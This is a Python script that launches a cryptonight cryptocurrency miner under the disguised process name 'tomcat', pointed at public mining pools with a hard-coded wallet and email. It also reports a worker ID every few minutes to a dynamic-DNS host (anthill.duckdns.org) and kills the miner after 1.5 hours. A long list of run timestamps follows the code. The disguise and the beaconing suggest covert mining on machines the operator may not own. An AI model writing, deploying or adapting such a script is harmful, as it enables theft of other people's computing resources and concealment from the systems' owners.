import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:06.832321
#2018-02-17 16:37:07.034562
#2018-02-17 18:25:05.763752
#2018-02-17 20:13:07.809290
#2018-02-17 22:01:05.308138
#2018-02-17 23:45:01.382359
#2018-02-18 01:35:07.877854
#2018-02-18 03:22:06.073441
#2018-02-18 05:10:07.734170
#2018-02-18 07:02:06.873376
#2018-02-18 08:51:06.222060
#2018-02-18 10:39:06.145196
#2018-02-18 12:24:06.530141
#2018-02-18 14:12:06.750361
#2018-02-18 16:02:03.352536
#2018-02-18 17:52:03.964887
#2018-02-18 19:38:06.783482
#2018-02-18 21:23:06.943187
#2018-02-18 23:12:07.321403
#2018-02-19 00:58:03.347693
#2018-02-19 02:46:03.564472
#2018-02-19 04:31:06.992596
#2018-02-19 06:15:09.388592
#2018-02-19 08:03:05.488331
#2018-02-19 09:53:01.759291
#2018-02-19 11:42:01.947885
#2018-02-19 13:29:07.182531
#2018-02-19 15:17:03.876550
#2018-02-19 17:04:08.352915
#2018-02-19 18:50:05.635608
#2018-02-19 20:38:06.848661
#2018-02-19 22:24:08.132590
#2018-02-20 00:11:06.789018
#2018-02-20 01:58:06.143059
#2018-02-20 03:48:05.513934
#2018-02-20 05:34:04.974095
#2018-02-20 07:18:04.096438
#2018-02-20 09:04:07.222032
#2018-02-20 10:47:06.802707
#2018-02-20 12:34:01.704075
#2018-02-20 14:21:07.117217
#2018-02-20 16:07:07.509825
#2018-02-20 17:53:01.876923
#2018-02-20 19:45:07.399498
#2018-02-20 21:34:01.391622
#2018-02-20 23:16:04.774795
#2018-02-21 01:02:07.100474
#2018-02-21 02:49:05.637272
#2018-02-21 04:38:01.427185
#2018-02-21 06:25:06.629591
#2018-02-21 08:11:07.248493
#2018-02-21 09:59:07.950720
#2018-02-21 11:48:07.982527
#2018-02-21 13:41:01.501501
#2018-02-21 15:24:04.778115
#2018-02-21 17:16:12.058225
#2018-02-21 19:04:09.346899
#2018-02-21 20:52:07.955615
#2018-02-21 22:38:02.098630
#2018-02-22 00:26:07.806041
#2018-02-22 02:13:06.265493
#2018-02-22 03:59:03.903819
#2018-02-22 05:46:07.211030
#2018-02-22 07:31:04.500951
#2018-02-22 09:21:08.344877
#2018-02-22 11:07:01.504361
#2018-02-22 12:52:08.959989
#2018-02-22 14:41:04.730832
#2018-02-22 16:27:06.866775
#2018-02-22 18:15:12.164591
#2018-02-22 20:06:04.800770
#2018-02-22 21:53:02.242487
#2018-02-22 23:42:06.313482
#2018-02-23 01:29:04.539385
#2018-02-23 03:16:03.830121
#2018-02-23 05:04:06.009270
#2018-02-23 06:50:01.517042
#2018-02-23 08:38:06.490814
#2018-02-23 10:53:01.289189
#2018-02-23 12:50:11.977811
#2018-02-23 14:34:01.748109
#2018-02-23 16:23:04.181168
#2018-02-23 18:09:05.662267
#2018-02-23 19:55:08.826882
#2018-02-23 21:38:05.344658
#2018-02-23 23:28:04.619832
#2018-02-24 01:20:09.931212
#2018-02-24 03:12:03.084598
#2018-02-24 04:57:06.494936
#2018-02-24 06:44:04.112779
#2018-02-24 08:38:06.245848
#2018-02-24 10:22:07.192287
#2018-02-24 12:17:01.903089
#2018-02-24 14:09:03.502546
#2018-02-24 15:56:02.736961
#2018-02-24 17:48:01.691395
#2018-02-24 19:36:05.572522
#2018-02-24 21:23:05.293523
#2018-02-25 01:13:04.581360
#2018-02-25 05:04:03.689552
#2018-02-25 10:01:01.702680